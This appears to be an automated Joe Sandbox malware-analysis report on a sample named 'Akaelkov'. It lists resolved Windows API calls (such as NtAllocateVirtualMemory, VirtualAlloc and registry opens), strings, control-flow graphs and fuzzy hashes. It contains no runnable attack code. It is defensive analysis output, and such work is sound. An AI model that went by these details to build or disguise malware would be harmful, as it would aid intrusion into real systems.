                                                                                                    • Opcode Fuzzy Hash: dec7ec7695fe1640c704fb7054e57799260cb30f75dba453070541c8a224f21d
                                                                                                    • Instruction Fuzzy Hash: 60F0E9315057157EF11071345D40EFF729DCBC2778F148A2DF594EA180D662AD4982BA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0408FB8D
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0408FB93
                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0408FBB3
                                                                                                    Strings
                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 0408FB88
                                                                                                    • NtAllocateVirtualMemory, xrefs: 0408FB83
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                    • API String ID: 421316089-2206134580
                                                                                                    • Opcode ID: b43b267bc352eb4cc4c21a604f8e3708ea86073cc9056120a8d52aca0785b01a
                                                                                                    • Instruction ID: 3c340b994b48c90bfe35ffb4663d56511b81cc32b41867160c8cb095f6f020af
                                                                                                    • Opcode Fuzzy Hash: b43b267bc352eb4cc4c21a604f8e3708ea86073cc9056120a8d52aca0785b01a
                                                                                                    • Instruction Fuzzy Hash: 6AE01AB260020DBFDB00EFA8D941EDB37ECEB08750F004415BA09EB101D675F990CB65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0408FB8D
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0408FB93
                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0408FBB3
                                                                                                    Strings
                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 0408FB88
                                                                                                    • NtAllocateVirtualMemory, xrefs: 0408FB83
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                    • API String ID: 421316089-2206134580
                                                                                                    • Opcode ID: c7098c9258a346c5f97600179207324f8f828775c1115547657c6afc10a94b8d
                                                                                                    • Instruction ID: afa9fbeebf0456f21e2750c2b2cc8ba50e1692d5492919b2756c59feafb2d94b
                                                                                                    • Opcode Fuzzy Hash: c7098c9258a346c5f97600179207324f8f828775c1115547657c6afc10a94b8d
                                                                                                    • Instruction Fuzzy Hash: 54E01AB250020DBBCB00EFA8D941ECB37ECEB08750F004405BA09EB101C675F990CB65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(0410A358,00000000), ref: 0408FD97
                                                                                                    • GetCurrentProcess.KERNEL32(0410A35C,Function_00005ADC,00000004,0410A360,00000000,0410A35C,17D783FC,00000040,0410A360,0410A358,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0408FDE3
                                                                                                    • FreeLibrary.KERNEL32(0410A358,00000000,0410A35C,Function_00005ADC,00000004,0410A360,00000000,0410A35C,17D783FC,00000040,0410A360,0410A358,00000000,00000000,00000000,00000000), ref: 0408FDF4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressCurrentFreeLibraryProcProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 4006369052-0
                                                                                                    • Opcode ID: cd7cebcd169e748ce482d77e9830ddd876d08922a9d9020ffe1e35684b6454b7
                                                                                                    • Instruction ID: deac98659a27f91d6c6f0a5babf4d6e15d102c5a32ce73f1a0835cef2baf0caf
                                                                                                    • Opcode Fuzzy Hash: cd7cebcd169e748ce482d77e9830ddd876d08922a9d9020ffe1e35684b6454b7
                                                                                                    • Instruction Fuzzy Hash: 21117F70A00744BBEB00FBB8CE52B9E7BA8DF0565CF508414B144FB290CB79BD908B1A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 040CB7A3
                                                                                                    • NtClose.NTDLL(?), ref: 040CB81D
                                                                                                      • Part of subcall function 04074F68: SysFreeString.OLEAUT32 ref: 04074F76
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Path$CloseFreeNameName_String
                                                                                                    • String ID:
                                                                                                    • API String ID: 11680810-0
                                                                                                    • Opcode ID: f3dfeb7edf34c0e0e80aa8ee9a8a90059857f0c0528731accb320a6f1f27e662
                                                                                                    • Instruction ID: d07a739946f4dc44da01d8904281947e3085d5a3f039beee63d02e4f76bb3b6f
                                                                                                    • Opcode Fuzzy Hash: f3dfeb7edf34c0e0e80aa8ee9a8a90059857f0c0528731accb320a6f1f27e662
                                                                                                    • Instruction Fuzzy Hash: 9721CC71A50308BAEB11EBA4DC42FDEB7BCAB08B08F510565F600F71C0DAB4BA059B95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,040B7598), ref: 040B7441
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 040B748F
                                                                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 040B74C5
                                                                                                    • RegisterClipboardFormatA.USER32(00000000), ref: 040B74DB
                                                                                                      • Part of subcall function 04087B44: RtlInitializeCriticalSection.NTDLL(List), ref: 04087B63
                                                                                                      • Part of subcall function 040B7028: SetErrorMode.KERNEL32(00008000), ref: 040B7041
                                                                                                      • Part of subcall function 040B7028: GetModuleHandleA.KERNEL32(USER32,00000000,040B718E,?,00008000), ref: 040B7065
                                                                                                      • Part of subcall function 040B7028: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 040B7072
                                                                                                      • Part of subcall function 040B7028: LoadLibraryA.KERNEL32(imm32.dll,00000000,040B718E,?,00008000), ref: 040B708E
                                                                                                      • Part of subcall function 040B7028: GetProcAddress.KERNEL32(040DB54C,ImmGetContext), ref: 040B70B0
                                                                                                      • Part of subcall function 040B7028: GetProcAddress.KERNEL32(040DB54C,ImmReleaseContext), ref: 040B70C5
                                                                                                      • Part of subcall function 040B7028: GetProcAddress.KERNEL32(040DB54C,ImmGetConversionStatus), ref: 040B70DA
                                                                                                      • Part of subcall function 040B7028: GetProcAddress.KERNEL32(040DB54C,ImmSetConversionStatus), ref: 040B70EF
                                                                                                      • Part of subcall function 040B7028: GetProcAddress.KERNEL32(040DB54C,ImmSetOpenStatus), ref: 040B7104
                                                                                                      • Part of subcall function 040B7028: GetProcAddress.KERNEL32(040DB54C,ImmSetCompositionWindow), ref: 040B7119
                                                                                                      • Part of subcall function 040B7028: GetProcAddress.KERNEL32(040DB54C,ImmSetCompositionFontA), ref: 040B712E
                                                                                                      • Part of subcall function 040B7028: GetProcAddress.KERNEL32(040DB54C,ImmGetCompositionStringA), ref: 040B7143
                                                                                                      • Part of subcall function 040B7028: GetProcAddress.KERNEL32(040DB54C,ImmIsIME), ref: 040B7158
                                                                                                      • Part of subcall function 040B7028: GetProcAddress.KERNEL32(040DB54C,ImmNotifyIME), ref: 040B716D
                                                                                                      • Part of subcall function 040B7028: SetErrorMode.KERNEL32(?,040B7195,00008000), ref: 040B7188
                                                                                                      • Part of subcall function 040C1538: GetKeyboardLayout.USER32(00000000), ref: 040C157D
                                                                                                      • Part of subcall function 040C2740: LoadIconA.USER32(04107030,MAINICON), ref: 040C2837
                                                                                                      • Part of subcall function 040C2740: GetModuleFileNameA.KERNEL32(04107030,?,00000100,04107030,MAINICON,?,?,?,040B7530,00000000,00000000,?,00000000,?,00000000,040B7598), ref: 040C2869
                                                                                                      • Part of subcall function 040C2740: OemToCharA.USER32(?,?), ref: 040C287C
                                                                                                      • Part of subcall function 040C2740: CharNextA.USER32(?,?,?,04107030,?,00000100,04107030,MAINICON,?,?,?,040B7530,00000000,00000000,?,00000000), ref: 040C28BB
                                                                                                      • Part of subcall function 040C2740: CharLowerA.USER32(00000000,?,?,?,04107030,?,00000100,04107030,MAINICON,?,?,?,040B7530,00000000,00000000,?), ref: 040C28C1
                                                                                                    • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,040B7598), ref: 040B755F
                                                                                                    • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 040B7570
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$CharModule$CurrentErrorHandleLoadMode$AtomClipboardCriticalFileFormatGlobalIconInitializeKeyboardLayoutLibraryLowerNameNextProcessRegisterSectionThread
                                                                                                    • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                                                                                    • API String ID: 1041971040-1126952177
                                                                                                    • Opcode ID: 2b8342c28ca1c801fcd4af707f3f9d45b3bb22371873fdd4f0a183c9708052db
                                                                                                    • Instruction ID: c7ad049dcc2a0664f8244870b458572d1589ec52ceed2c21f22428c1290fc38d
                                                                                                    • Opcode Fuzzy Hash: 2b8342c28ca1c801fcd4af707f3f9d45b3bb22371873fdd4f0a183c9708052db
                                                                                                    • Instruction Fuzzy Hash: CF412BB4E002099BE700FFA9D8909DE77B9EB5920CB018525E405F7251DA79BD848F99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 5027 40c2740-40c274d 5028 40c274f-40c2752 call 4073bdc 5027->5028 5029 40c2757-40c276f call 408d8bc 5027->5029 5028->5029 5033 40c277f-40c2789 5029->5033 5034 40c2771-40c2779 5029->5034 5035 40c2799-40c2890 call 40738a0 * 3 call 4097150 LoadIconA call 4097524 GetModuleFileNameA OemToCharA call 407ce38 5033->5035 5036 40c278b-40c2793 5033->5036 5034->5033 5049 40c28a0-40c28af call 407ce6c 5035->5049 5050 40c2892-40c289b call 4079024 5035->5050 5036->5035 5054 40c28b4-40c28e9 CharNextA CharLowerA call 40749f8 call 408ea38 5049->5054 5055 40c28b1 5049->5055 5050->5049 5059 40c28ee-40c28fc 5054->5059 5055->5054 5060 40c28fe-40c2900 call 40c2a94 5059->5060 5061 40c2905-40c2934 call 40c4b14 call 40c5674 5059->5061 5060->5061 5067 40c2945-40c294c 5061->5067 5068 40c2936-40c2942 call 4073c34 5061->5068 5068->5067
                                                                                                    APIs
                                                                                                    • LoadIconA.USER32(04107030,MAINICON), ref: 040C2837
                                                                                                    • GetModuleFileNameA.KERNEL32(04107030,?,00000100,04107030,MAINICON,?,?,?,040B7530,00000000,00000000,?,00000000,?,00000000,040B7598), ref: 040C2869
                                                                                                    • OemToCharA.USER32(?,?), ref: 040C287C
                                                                                                    • CharNextA.USER32(?,?,?,04107030,?,00000100,04107030,MAINICON,?,?,?,040B7530,00000000,00000000,?,00000000), ref: 040C28BB
                                                                                                    • CharLowerA.USER32(00000000,?,?,?,04107030,?,00000100,04107030,MAINICON,?,?,?,040B7530,00000000,00000000,?), ref: 040C28C1
                                                                                                      • Part of subcall function 040C2A94: GetClassInfoA.USER32(041097F8,040DB674,?), ref: 040C2AF3
                                                                                                      • Part of subcall function 040C2A94: RegisterClassA.USER32(040DB650), ref: 040C2B0B
                                                                                                      • Part of subcall function 040C2A94: SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 040C2BA7
                                                                                                      • Part of subcall function 040C2A94: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 040C2BC9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow
                                                                                                    • String ID: MAINICON
                                                                                                    • API String ID: 2763768735-2283262055
                                                                                                    • Opcode ID: 8e83b239960b8265144de6a346d600fae8a7f33a6a120ea5c7d456af3be5487e
                                                                                                    • Instruction ID: fb1e7826ce0ec8382ea5f9902ce4d8900536aeff541a07d59e7f43592c78969b
                                                                                                    • Opcode Fuzzy Hash: 8e83b239960b8265144de6a346d600fae8a7f33a6a120ea5c7d456af3be5487e
                                                                                                    • Instruction Fuzzy Hash: D8511270A04245DFEB50EF68C884BC97BE4AB1530CF4441B9DC48EF256D7B9A988CB65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 5077 40717c3-40717d2 5078 4071a04-4071a09 5077->5078 5079 40717d8-40717e8 5077->5079 5082 4071a0f-4071a20 5078->5082 5083 4071b1c-4071b1f 5078->5083 5080 4071840-4071849 5079->5080 5081 40717ea-40717f7 5079->5081 5080->5081 5088 407184b-4071857 5080->5088 5084 4071810-407181c 5081->5084 5085 40717f9-4071806 5081->5085 5086 40719d4-40719e1 5082->5086 5087 4071a22-4071a3e 5082->5087 5089 4071b25-4071b27 5083->5089 5090 4071720-4071749 VirtualAlloc 5083->5090 5096 407181e-407182c 5084->5096 5097 407188c-4071895 5084->5097 5091 4071830-407183d 5085->5091 5092 4071808-407180c 5085->5092 5086->5087 5093 40719e3-40719f7 Sleep 5086->5093 5098 4071a40-4071a48 5087->5098 5099 4071a4c-4071a5b 5087->5099 5088->5081 5100 4071859-4071865 5088->5100 5094 407177b-4071781 5090->5094 5095 407174b-4071778 call 40716e0 5090->5095 5093->5087 5103 40719f9-4071a00 Sleep 5093->5103 5095->5094 5101 4071897-40718a4 5097->5101 5102 40718c8-40718d2 5097->5102 5105 4071aa8-4071abe 5098->5105 5106 4071a74-4071a7c 5099->5106 5107 4071a5d-4071a71 5099->5107 5100->5081 5108 4071867-407187a Sleep 5100->5108 5101->5102 5111 40718a6-40718ba Sleep 5101->5111 5112 4071944-4071950 5102->5112 5113 40718d4-40718ff 5102->5113 5103->5086 5114 4071ad7-4071ae3 5105->5114 5115 4071ac0-4071ace 5105->5115 5109 4071a7e-4071a96 5106->5109 5110 4071a98-4071a9a call 4071668 5106->5110 5107->5105 5108->5081 5117 4071880-4071887 Sleep 5108->5117 5118 4071a9f-4071aa7 5109->5118 5110->5118 5111->5102 5120 40718bc-40718c3 Sleep 5111->5120 5126 4071952-4071964 5112->5126 5127 4071978-4071987 call 4071668 5112->5127 5121 4071901-407190f 5113->5121 5122 4071918-4071926 5113->5122 5124 4071ae5-4071af8 5114->5124 5125 4071b04 5114->5125 5115->5114 5123 4071ad0 5115->5123 5117->5080 5120->5101 5121->5122 5129 4071911 5121->5129 5130 4071994 5122->5130 5131 4071928-4071942 call 407159c 5122->5131 5123->5114 5132 4071afa-4071aff call 407159c 5124->5132 5133 4071b09-4071b1b 5124->5133 5125->5133 5134 4071966 5126->5134 5135 4071968-4071976 5126->5135 5136 4071999-40719d2 5127->5136 5140 4071989-4071993 5127->5140 5129->5122 5130->5136 5131->5136 5132->5133 5134->5135 5135->5136
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000000), ref: 0407186C
                                                                                                    • Sleep.KERNEL32(0000000A,00000000), ref: 04071882
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3472027048-0
                                                                                                    • Opcode ID: 1ddd4194d8da4c4630a6c025c1479181092807dbfe480be67e3bf53c9a04f5ba
                                                                                                    • Instruction ID: 9b6a8f4513c4d1e4acd162249a5f022f78bda6e3872908fd15118eaf861276f6
                                                                                                    • Opcode Fuzzy Hash: 1ddd4194d8da4c4630a6c025c1479181092807dbfe480be67e3bf53c9a04f5ba
                                                                                                    • Instruction Fuzzy Hash: D9B12672A003118BC715CF69E884365BBE1FB85354F1882AED465AF3C5D7B8B8C1CB96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 5146 4071b2b-4071b37 5147 4071b3d-4071b41 5146->5147 5148 4071c08-4071c0b 5146->5148 5151 4071ba4-4071bad 5147->5151 5152 4071b43-4071b4a 5147->5152 5149 4071c11-4071c1b 5148->5149 5150 4071cf8-4071cfc 5148->5150 5156 4071c1d-4071c29 5149->5156 5157 4071bd8-4071be5 5149->5157 5153 4071784-40717a7 call 40716e0 VirtualFree 5150->5153 5154 4071d02-4071d07 5150->5154 5151->5152 5155 4071baf-4071bc3 Sleep 5151->5155 5158 4071b4c-4071b57 5152->5158 5159 4071b78-4071b7a 5152->5159 5174 40717b2 5153->5174 5175 40717a9-40717b0 5153->5175 5155->5152 5163 4071bc9-4071bd4 Sleep 5155->5163 5165 4071c60-4071c6e 5156->5165 5166 4071c2b-4071c2e 5156->5166 5157->5156 5164 4071be7-4071bfb Sleep 5157->5164 5167 4071b60-4071b75 5158->5167 5168 4071b59-4071b5e 5158->5168 5160 4071b8f 5159->5160 5161 4071b7c-4071b8d 5159->5161 5169 4071b92-4071b9f 5160->5169 5161->5160 5161->5169 5163->5151 5164->5156 5173 4071bfd-4071c04 Sleep 5164->5173 5171 4071c32-4071c36 5165->5171 5172 4071c70-4071c75 call 407155c 5165->5172 5166->5171 5169->5149 5177 4071c78-4071c85 5171->5177 5178 4071c38-4071c3e 5171->5178 5172->5171 5173->5157 5179 40717b5-40717bf 5174->5179 5175->5179 5177->5178 5181 4071c87-4071c8e call 407155c 5177->5181 5182 4071c90-4071c9a 5178->5182 5183 4071c40-4071c5e call 407159c 5178->5183 5181->5178 5186 4071c9c-4071cc4 VirtualFree 5182->5186 5187 4071cc8-4071cf5 call 40715fc 5182->5187
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000000), ref: 04071BB3
                                                                                                    • Sleep.KERNEL32(0000000A,00000000), ref: 04071BCD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3472027048-0
                                                                                                    • Opcode ID: 623edf578640f13ea373fcbe942470d71ad0eec17b66cb473c21c71429a9eff8
                                                                                                    • Instruction ID: 5b27560811c23b4ab9d2b9ca89ebaed9360bf62f16d1cb7077ecbb9a85c0e1d1
                                                                                                    • Opcode Fuzzy Hash: 623edf578640f13ea373fcbe942470d71ad0eec17b66cb473c21c71429a9eff8
                                                                                                    • Instruction Fuzzy Hash: B651E171A103408FEB158F68D985766BBD4EF45318F1881AED444AF3C2E6B4F885CB9B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 5192 409765c-4097696 MulDiv 5193 4097698-409769f call 4097618 5192->5193 5194 40976ae-40976e7 call 4090204 call 40902a4 call 4090308 5192->5194 5193->5194 5200 40976a1-40976a9 call 4074820 5193->5200 5205 40976e9-40976f4 call 4090538 5194->5205 5206 4097701-4097716 call 40738d0 5194->5206 5200->5194 5209 40976f9-40976fc call 4090274 5205->5209 5209->5206
                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(00000008,0410A374,00000048), ref: 04097682
                                                                                                      • Part of subcall function 04097618: SelectObject.GDI32(00000000,0410A380), ref: 04097633
                                                                                                    Strings
                                                                                                    • SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 040976D8
                                                                                                    • Tahoma, xrefs: 040976A4
                                                                                                    • MS Shell Dlg 2, xrefs: 040976EC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectSelect
                                                                                                    • String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma
                                                                                                    • API String ID: 1517587568-1011973972
                                                                                                    • Opcode ID: ca9e655dc8ed7556d74959dc7e76bf118a99cc8263d025620293aec8a31daff1
                                                                                                    • Instruction ID: cfe42c1f01d578b269362d38390d23867c803d24dcefd1cfd9d9458660536212
                                                                                                    • Opcode Fuzzy Hash: ca9e655dc8ed7556d74959dc7e76bf118a99cc8263d025620293aec8a31daff1
                                                                                                    • Instruction Fuzzy Hash: DE11A332A10208EFEF41EFA8C94199DBBF5EF4A608F914460E840B7650DB35BD41EB15
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 5212 408ea38-408ea66 GetClassInfoA 5213 408ea68-408ea70 5212->5213 5214 408ea72-408ea74 5212->5214 5213->5214 5215 408ea91-408eac6 call 407738c 5213->5215 5216 408ea76-408ea82 UnregisterClassA 5214->5216 5217 408ea87-408ea8c RegisterClassA 5214->5217 5220 408eac8-408eace call 408e97c 5215->5220 5221 408eadc-408eae2 5215->5221 5216->5217 5217->5215 5223 408ead3-408ead7 SetWindowLongA 5220->5223 5223->5221
                                                                                                    APIs
                                                                                                    • GetClassInfoA.USER32(041097F8,040DAB1C,?), ref: 0408EA59
                                                                                                    • UnregisterClassA.USER32(040DAB1C,041097F8), ref: 0408EA82
                                                                                                    • RegisterClassA.USER32(040DAAF8), ref: 0408EA8C
                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0408EAD7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 4025006896-0
                                                                                                    • Opcode ID: e634ed528da378c5aaef80610f86dc106d3915ebeb71d2ffb9f6a082ed0be731
                                                                                                    • Instruction ID: b6b30849b7d8738359af6a094937600510eed23175ba806956ad8b45d21f3813
                                                                                                    • Opcode Fuzzy Hash: e634ed528da378c5aaef80610f86dc106d3915ebeb71d2ffb9f6a082ed0be731
                                                                                                    • Instruction Fuzzy Hash: 62016172B002056BEA40FF98DC90FDA37D9EB09718F108124B955F7282D679FC858BA6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,040904A2), ref: 04090374
                                                                                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,040904A2), ref: 040903DF
                                                                                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 04090444
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    • Opcode ID: 86797d4d26a01b277af2700df6f229cb6330cf017765e743632db33bb38913da
                                                                                                    • Instruction ID: 335ddb25b46f7f06e6152ae69fc06078a52111e26bc282db348e5e57b549a607
                                                                                                    • Opcode Fuzzy Hash: 86797d4d26a01b277af2700df6f229cb6330cf017765e743632db33bb38913da
                                                                                                    • Instruction Fuzzy Hash: FA417F70B40648BFEF11EBA4C951BDEBBF9AF04308F108469A844B7251DBB5AF05AB45
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 5342 408f2a8-408f2f2 call 4075248 5345 408f30b-408f30d 5342->5345 5346 408f2f4-408f306 call 407c148 call 407412c 5342->5346 5348 408f313-408f327 5345->5348 5349 408f4d4-408f4fb 5345->5349 5346->5345 5353 408f329-408f343 5348->5353 5351 408f4fd-408f50c 5349->5351 5352 408f525-408f528 5349->5352 5359 408f50e 5351->5359 5360 408f513-408f523 5351->5360 5354 408f539-408f555 5352->5354 5355 408f52a-408f52c 5352->5355 5356 408f35d-408f361 5353->5356 5357 408f345-408f358 5353->5357 5368 408f55a-408f55c 5354->5368 5355->5354 5361 408f52e-408f532 5355->5361 5363 408f363-408f372 5356->5363 5364 408f3d7-408f3d9 5356->5364 5362 408f4cb-408f4ce 5357->5362 5359->5360 5360->5354 5361->5354 5365 408f534 5361->5365 5362->5349 5362->5353 5366 408f3a4-408f3cc call 40756b8 5363->5366 5367 408f374-408f3a2 call 40756b8 5363->5367 5369 408f3db-408f3df 5364->5369 5370 408f420-408f424 5364->5370 5365->5354 5390 408f3cf-408f3d2 5366->5390 5367->5390 5374 408f55e-408f561 call 408f880 5368->5374 5375 408f566-408f56b 5368->5375 5377 408f3e1-408f3eb 5369->5377 5378 408f403-408f41b 5369->5378 5371 408f499-408f4b0 5370->5371 5372 408f426-408f42e 5370->5372 5379 408f4c7 5371->5379 5383 408f4b2-408f4b6 5371->5383 5380 408f46e-408f497 5372->5380 5381 408f430-408f46c call 40756b8 5372->5381 5374->5375 5386 408f589-408f59b 5375->5386 5387 408f56d-408f57a 5375->5387 5377->5378 5388 408f3ed-408f3fe call 407fe44 5377->5388 5378->5379 5379->5362 5380->5379 5381->5379 5383->5379 5391 408f4b8-408f4c4 5383->5391 5394 408f59d-408f5ad SysFreeString 5386->5394 5395 408f5af 5386->5395 5392 408f57c-408f580 call 4075694 5387->5392 5393 408f585-408f587 5387->5393 5388->5378 5390->5379 5391->5379 5392->5393 5393->5386 5393->5387 5394->5394 5394->5395
                                                                                                    APIs
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0408F5A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeString
                                                                                                    • String ID: H
                                                                                                    • API String ID: 3341692771-2852464175
                                                                                                    • Opcode ID: 55380cfe049a58cc8e581fdfff9da7b4fcfff47eea94b9c22ea8e3c03c7c32bb
                                                                                                    • Instruction ID: 0f4123984c2daef85a4b4e8671ddc63f278efeb4a27c975c1c752769619a6ee1
                                                                                                    • Opcode Fuzzy Hash: 55380cfe049a58cc8e581fdfff9da7b4fcfff47eea94b9c22ea8e3c03c7c32bb
                                                                                                    • Instruction Fuzzy Hash: 2EB10374A01609DFDB50EFA9D580A9DBBF2FF89314F24816AE945AB320D730AC45CF54
